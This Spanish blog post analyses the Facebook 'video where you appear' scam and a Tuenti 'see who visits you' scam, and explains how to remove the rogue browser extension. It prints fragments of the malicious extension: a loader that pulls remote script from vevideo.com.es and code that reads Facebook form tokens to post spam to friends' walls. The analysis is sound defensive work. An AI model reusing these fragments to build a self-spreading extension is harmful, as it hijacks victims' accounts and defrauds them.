Desinstalar el famoso "virus del video" de Facebook

En un principio no iba a escribir nada sobre esto pero este post tiene que ver con la última entrada. Al final lo explico.
Hoy al meterme en facebook en mi perfil había lo siguiente, y parece ser que a más de una persona le ha pasado:

 Como no, he dudado bastante y me he imaginado que estaba ante otra de esas estafas que se extienden.

Pasos que he seguido para analizar un poco lo que pasa:
[También explico como des-instalar el comúnmente llamado "virus de Facebook" aunque no tenga nada que ver ni con un virus ni con Facebook.]

1) He clickado en el link para ver donde me llevaba ese sospechoso vídeo.

 2) Dicho link me ha llevado a esta página:

 Si nos fijamos en la barra de direcciones, podemos ver que ya estamos fuera de Facebook, por lo que se nos debería de hacer extraño.

Nos dicen que para poder ver el video clickemos en Continue

No clickeis, si lo habéis hecho y usáis Firefox os saldrá una alerta diciendo que se quiere instalar el plugin, pulsar en la x o en "esta vez no". Y si ya lo habéis instalado al final os explico como eliminarlo.

3) Si queréis ver que archivo se os instala he mirado el código fuente de la página web y hay un script con lo siguiente:

            <script>
                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
                function instalar(){
                    if (is_chrome){
                        window.open("http://vevideo.com.es/plugin/youtube.crx");
                    } else if(is_firefox){
                        var params = {
                            "Youtube Extension": {
                                URL: "http://vevideo.com.es/plugin/youtube.xpi",
                                toString: function () { return this.URL; }
                            }
                        };
                        InstallTrigger.install(params);
                    } else{
                         top.location.href="http://vevideo.com.es/plugin/unlocked.php";
                    }
                }
            </script>

 Hay una función llamada instalar() que dependiendo si usas Chrome o si usas Firefox te descarga el archivo correspondiente para el navegador. (esta vez los de Internet Explorer están a salvo!)

Me he bajado ambas versiones, una para instalarlo en un navegador que tengo para hacer pruebas y la otra par ver el código interno y ver un poco que hace.
Yo me he bajado la extensión para firefox, tiene una extensión .xpi pero con un simple renombrar a .zip ya se puede descomprimir el fichero y ver todo lo que hay dentro. (Aquí el fichero por si le queréis echar un vistazo).

4) A la hora de instalarlo te sale esto:

Una vez instalado F5 y te sale esto otro:

Y tachán! aquí esta lo que mencionaba sólo empezar este post diciendo que tenía que ver con la anterior entrada:



  Volvemos a estar ante la misma página que nos aseguraba que podríamos ver quien visita nuestro perfil de tuenti si ingresábamos nuestro número. Otra vez nombran (Actualizo para aclarar malinterpretaciones (16-12-11): en ningún momento digo que sean ellos los responsables de todo esto, no sería de extrañar que hayan contratado a una subempresa) a la empresa "X" y si leemos la letra pequeña otra vez nos puedo costar unos 35€/mes la broma... Y obviamente, seguiremos sin poder ver el vídeo que nos prometían.





5) Respecto a la extensión/plugin o comúnmente llamado "virus o algo así del facebook" x) que se nos ha instalado en nuestro navegador, voy a mencionar varias cosas sobre el código.

 En el archivo youtube.js de la extensión que nos hacen instalar se ve lo siguiente

 loadScript_you();
function loadScript_you() {
...
    s.setAttribute("src", "http://vevideo.com.es/plugin/script.js");
...
}

En dicho código javascript se llama a este otro:
http://vevideo.com.es/plugin/extra.js
 

var blogs = new Array();
blogs[0] = 'http://ferdie11.blogspot.com/';
blogs[1] = 'http://ferdie22.blogspot.com/';
blogs[2] = 'http://ferdie333.blogspot.com/';
blogs[3] = 'http://ferdie44.blogspot.com/';
...

randno2 = Math.floor ( Math.random() * blogs.length );
blog=blogs[randno2];

 ...

function enchulatuFB(){...

var post_form_id=document['getElementsByName']('post_form_id')[0]['value'];
var fb_dtsg=document['getElementsByName']('fb_dtsg')[0]['value'];
var video_url=blog;
var domains=['http://i43.tinypic.com/k1a1rd.png'];
var p0=['.'];
var p1=['hola','como va','como estas!','Que tal','Hola!','Mira!'];
var p2=['has visto que','ya vistes que','sabes que'];
var p3=[' sales en un video??'];
var message='';
var a;
gf=new XMLHttpRequest(); ...

Como se puede observar, crean tres vectores para crear frases aleatorias saludándote y preguntándote de distintas formas si has visto el vídeo. Estás serán las que luego escribirás a tus amigos sin tú consentimiento.
También se puede ver la dirección de la imagen que se agrega a dicho comentario (la foto borrosa de gente de fiesta).

Otra cosa que me ha parecido curiosa es el comienzo del código, crean otro array de blogs, supongo que lo deben hacer para que siempre hayan enlaces vivos por facebook para que los usuarios sigan clickando, así, aunque los usuarios de facebook denuncie como spam el vídeo que le han puesto en su muro, creo que sólo se marca como spam lo que venga de ese blog, por lo que si tienen diversos blogs como (http://roter5.blogspot.com/, http://aderf6.blogspot.com/ o http://deltw6.blogspot.com/) siempre les quedarán webs activas donde alojar su código "malicioso ".


En resumen, un amigo nos dice si hemos visto el video dónde tú sales, la gente clicka, se instala el plugin/extensión para "poder ver el video", dicho video no existe pero ahora tienes una extensión en tu navegador la cual hará que vayas escribiendo sin tu consentimiento a muros aleatorios de tus amigos si han visto un video dónde salen, y así sucesivamente.
¿Y para qué hacen esto? Facebook tiene más de 500 millones de usuarios registrados, es decir, hay más usuarios registrados en Facebook que habitantes viviendo en Europa. Por lo que tan sólo se instale una minoría el plugin, es muy fácil que se extienda, y con que una minoría haga todos los pasos e ingrese al final su número de teléfono para "poder ver el vídeo", ya se pueden imaginar la de cantidad de dinero que pueden hacer si cada mes pueden llegar a ganar 35€/persona. Respuesta: Lo hacen por dinero.



Si te has enterado ahora de esto y ya te has instalado dicho plugin/extensión tan sólo tienes que hacer esto:

• Si usas Chrome como navegador pulsa en  Herramientas-Extensiones y te saldrá algo así:

 

Pulsas en Desisntalar y ya está.

• Si usas Firefox (Mozilla) tan sólo tendrás que pulsar en Herramientas-Complementos, ir a la pestaña de Plugins y donde ponga Extension YouTube pulsar en Desactivar y/o Eliminar

Conclusiones:

• No se fíen de todo lo que les aparece en vuestro muro.
• Eviten insertar el número de teléfono por Internet.
• Si los propios navegadores os advierten de que es peligroso instalar una extensión o un plugin, hagan caso a no ser que sepan que están haciendo exactamente.

Tuenti: "Fallo que te permite ver quien te visita"?

Hoy voy rápido:

Hace un par de días me conecté a tuenti y me habían invitado a un evento que decía lo siguiente: 

HAY UN FALLO QUE PERMITE VER QUIEN TE VISITA!!! Cuando alguien te visita, se aumenta una visita a tu contador, pero no se puede ver quien fue el que realizo la visita. Con esta aplicación podrás averiguar quien fue, ya que debido a un fallo, se puede averiguar.

Para descargar la aplicación haz click en el siguiente enlace: http://goo.gl/vO28y

Como siempre (ver mi otras entradas aquí o aquí), no es verdad.

Aquí la demostración:

• 1) Clicko y tuenti ya me avisa de que tenga cuidado, pulso en continuar y me redirigen un par de veces (live http headers & NoScript activados) hasta llegar a una página para introducir tú móvil.

[http://ese.sinfindejuegos.com/wsb/Subscribe.aspx?i=241f7cda-3157-4c55-94e4-d42d922cf733]

• 2) En dichas re-direcciones, se pasa por un servidor APACHE! con CentOS como sistema operativo.

(La dirección del servidor: http://50.116.87.18/) Si metemos la dirección del servidor en la barra de direcciones de puede ver algo así "Apache 2 Test Page powered by CentOS" 

• 3) Pruebo ssh desde consola y lo tiene activo. También pruebo ftp y lo mismo. Pero como era de imaginar ambos con contraseña.

• 4) Hago un traceRoute y...: "50.116.87.18 is from United States(US) in region North America" parece ser que el servidor que nos ha redirigido está en America.

• 5) Por curiosidad miro un poco la letra pequeña de la web dónde nos pedían el número movil y nombran una empresa llamada "X".

Servicio de suscripción para descargar contenidos para móvil por tan sólo 1,42 € (IVA incluido) por sms recib. + precio de navegación wap, consulte con su operador. Máx.6 sms/sem.

 Vamos, que si te das de alta para poder "ver quien te visita en tuenti" y tardas un mes en darte cuenta de que en realidad te has suscrito en este servicio, te llega una factura de (1.42*6*4)  35 eurillos...  Y obviamente, sigues sin poder ver quien te visita x)

•  6) Con una herramienta de la universidad de Zaragoza analizo la empresa y esta es una sociedad limitada, está en sevilla, su web es www.X-mm.com, su actividad dicen que es "SERVICIOS DE PUBLICIDAD" y el Director ejecutivo es un tal XYZ con unos apellidos ingleses, en http://cargos.axesor.es/  he encontrado información sobre él. (Prefiero no nombrar a ninguna persona concreta en mi blog).

No creo que sea él realmente quien haga todo esto , seguramente haya contratado una subempresa (y posiblemente americana) sin saber cómo iban a trabajar.

Esta vez no me ha dado tiempo a mirar el código que estaba alojado en el servidor de America, lo han quitado muy rápido. Tanto la web del servidor, como el evento de tuenti.

¿Conclusiones?

1. No hacer ni caso a este tipo de eventos
2. No insertar nunca tu  número de teléfono por internet, a no ser que estés seguro de que sabes lo que haces.